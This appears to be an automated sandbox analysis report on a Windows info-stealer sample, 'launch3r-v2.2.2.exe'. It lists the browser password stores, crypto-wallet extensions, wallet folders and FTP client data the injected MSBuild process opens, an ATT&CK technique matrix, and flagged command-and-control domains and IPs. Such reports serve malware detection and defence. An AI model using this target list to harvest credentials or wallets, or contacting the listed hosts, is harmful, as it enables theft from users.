            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.2515196932.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7396, type: MEMORYSTR
            Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2512778341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation
            1
            DLL Side-Loading
            311
            Process Injection
            21
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Screen Capture
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            311
            Process Injection
            LSASS Memory231
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares31
            Data from Local System
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information
            NTDS1
            Process Discovery
            Distributed Component Object Model3
            Clipboard Data
            114
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Software Packing
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            launch3r-v2.2.2.exe31%VirustotalBrowse
            launch3r-v2.2.2.exe28%ReversingLabsWin64.Malware.Generic
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            jawdedmirror.run/ewqd0%Avira URL Cloudsafe
            owlflright.digital/qopy0%Avira URL Cloudsafe
            https://aquesolp.run/(0%Avira URL Cloudsafe
            https://aquesolp.run/agosoz100%Avira URL Cloudmalware
            lonfgshadow.live/xawi0%Avira URL Cloudsafe
            https://aquesolp.run/t:0%Avira URL Cloudsafe
            https://aquesolp.run/agosozso0%Avira URL Cloudsafe
            nighetwhisper.top/lekd0%Avira URL Cloudsafe
            https://aquesolp.run/0%Avira URL Cloudsafe
            https://aquesolp.run/p0%Avira URL Cloudsafe
            aquesolp.run/agosoz100%Avira URL Cloudmalware
            https://aquesolp.run:443/agosozl0%Avira URL Cloudsafe
            https://aquesolp.run/agosozB0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            199.232.210.172
            truefalse
              high
              ax-9999.ax-msedge.net
              150.171.28.254
              truefalse
                high
                edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                217.20.55.34
                truefalse
                  high
                  t.me
                  149.154.167.99
                  truefalse
                    high
                    aquesolp.run
                    104.21.22.10
                    truetrue
                      unknown
                      pki-goog.l.google.com
                      142.250.9.94
                      truefalse
                        high
                        c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com
                        unknown
                        unknownfalse
                          high
                          c.pki.goog
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            owlflright.digital/qopytrue
                            • Avira URL Cloud: safe
                            unknown
                            liftally.top/xasjfalse
                              high
                              jawdedmirror.run/ewqdtrue
                              • Avira URL Cloud: safe
                              unknown
                              nighetwhisper.top/lekdtrue
                              • Avira URL Cloud: safe
                              unknown
                              https://aquesolp.run/agosozfalse
                              • Avira URL Cloud: malware
                              unknown
                              salaccgfa.top/gsoozfalse
                                high
                                lonfgshadow.live/xawitrue
                                • Avira URL Cloud: safe
                                unknown
                                http://c.pki.goog/r/gsr1.crlfalse
                                  high
                                  http://c.pki.goog/r/r4.crlfalse
                                    high
                                    changeaie.top/gepsfalse
                                      high
                                      zestmodp.top/zedafalse
                                        high
                                        https://t.me/asdawfqfalse
                                          high
                                          aquesolp.run/agosoztrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://aquesolp.run/(MSBuild.exe, 00000003.00000002.2513929639.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://aquesolp.run/t:MSBuild.exe, 00000003.00000002.2513929639.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://aquesolp.run/agosozsoMSBuild.exe, 00000003.00000002.2514228506.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://aquesolp.run/MSBuild.exe, 00000003.00000002.2513929639.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://aquesolp.run/pMSBuild.exe, 00000003.00000002.2513929639.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://aquesolp.run/agosozBMSBuild.exe, 00000003.00000002.2514321142.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://aquesolp.run:443/agosozlMSBuild.exe, 00000003.00000002.2513296452.0000000000B43000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.21.22.10
                                          aquesolp.runUnited States
                                          13335CLOUDFLARENETUStrue
                                          149.154.167.99
                                          t.meUnited Kingdom
                                          62041TELEGRAMRUfalse
                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1663604
                                          Start date and time:2025-04-12 01:44:08 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 0s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:11
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:launch3r-v2.2.2.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@3/0@4/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 71%
                                          • Number of executed functions: 43
                                          • Number of non-executed functions: 132
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 184.28.213.193, 199.232.210.172, 4.175.87.197, 52.165.164.15, 13.95.31.18, 217.20.55.34, 150.171.28.254
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, ax-ring.msedge.net, fe3.delivery.mp.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          TimeTypeDescription
                                          19:45:02API Interceptor8x Sleep call for process: MSBuild.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                          • telegram.org/img/emoji/40/F09F9889.png
                                          http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                          • telegram.org/img/favicon.ico
                                          http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                          • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                          http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                          • telegram.org/?setln=pl
                                          http://makkko.kz/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://telegram.dogGet hashmaliciousUnknownBrowse
                                          • telegram.dog/
                                          LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                          • t.me/cinoshibot
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          t.me21938546052.zipGet hashmaliciousUnknownBrowse
                                          • 65.108.151.63
                                          random.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                          • 149.154.167.99
                                          1NIvXH0g9J.ps1Get hashmaliciousUnknownBrowse
                                          • 65.108.151.63
                                          tc1kz56TNX.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          g8P4C3jHSJ.ps1Get hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          MRVerify.exeGet hashmaliciousLummaC Stealer, PrivateLoader, VidarBrowse
                                          • 149.154.167.99
                                          random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                          • 149.154.167.99
                                          random.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                          • 149.154.167.99
                                          worker.ps1Get hashmaliciousUnknownBrowse
                                          • 65.108.151.63
                                          ax-9999.ax-msedge.netTU PEDIDO.vbsGet hashmaliciousFormBookBrowse
                                          • 150.171.27.254
                                          tc1kz56TNX.exeGet hashmaliciousVidarBrowse
                                          • 150.171.28.254
                                          g8P4C3jHSJ.ps1Get hashmaliciousVidarBrowse
                                          • 150.171.28.254
                                          1NOT80-ScJ8-6OvO2-F34.msiGet hashmaliciousUnknownBrowse
                                          • 150.171.28.254
                                          RFQ.jsGet hashmaliciousAgentTeslaBrowse
                                          • 150.171.28.254
                                          Attached enquiry.jsGet hashmaliciousFormBookBrowse
                                          • 150.171.27.254
                                          UcsxgOVj23.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                          • 150.171.27.254
                                          Comprobante de pago (PAGOS BBVA).exeGet hashmaliciousDarkCloudBrowse
                                          • 150.171.27.254
                                          LetterStrings.exeGet hashmaliciousUnknownBrowse
                                          • 150.171.27.254
                                          jp8stNPnM9.exeGet hashmaliciousQuasarBrowse
                                          • 150.171.28.254
                                          bg.microsoft.map.fastly.netShareFile received.pdfGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          SecuriteInfo.com.Win32.MalwareX-gen.26952.14499.exeGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          SecuriteInfo.com.Win32.MalwareX-gen.29703.7480.exeGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          SecuriteInfo.com.Win32.MalwareX-gen.5654.2590.exeGet hashmaliciousLummaC StealerBrowse
                                          • 199.232.214.172
                                          SecuriteInfo.com.Win32.MalwareX-gen.30756.7481.exeGet hashmaliciousLummaC StealerBrowse
                                          • 199.232.210.172
                                          (No subject).emlGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          http://cliffordchance.lifeGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          Potassium.exeGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          6LqQVR.pdfGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          66e7fc6131f5ccda47ce44ce_kudifosefozo.pdfGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comSecuriteInfo.com.Trojan.Heur.TP.RuW@bOo3uBfc.2836.5163.exeGet hashmaliciousLummaC StealerBrowse
                                          • 217.20.55.22
                                          SecuriteInfo.com.Win32.MalwareX-gen.12458.14123.exeGet hashmaliciousLummaC StealerBrowse
                                          • 217.20.48.39
                                          4nsy2bvYRk.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 217.20.48.19
                                          Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 208.89.73.27
                                          Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 208.89.73.21
                                          Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 208.89.73.19
                                          sPDwT5Hyb5.exeGet hashmaliciousLummaC StealerBrowse
                                          • 208.89.73.31
                                          final-payload.bin.exeGet hashmaliciousUnknownBrowse
                                          • 208.89.73.17
                                          oboaK5q9JH.dllGet hashmaliciousMetasploitBrowse
                                          • 208.89.73.25
                                          final-payload.bin.exeGet hashmaliciousDcRatBrowse
                                          • 208.89.73.31
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TELEGRAMRUhttps://cola-careers.site/apply/id834285345Get hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          https://t.ly/uBgZUGet hashmaliciousUnknownBrowse
                                          • 149.154.167.99
                                          random.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
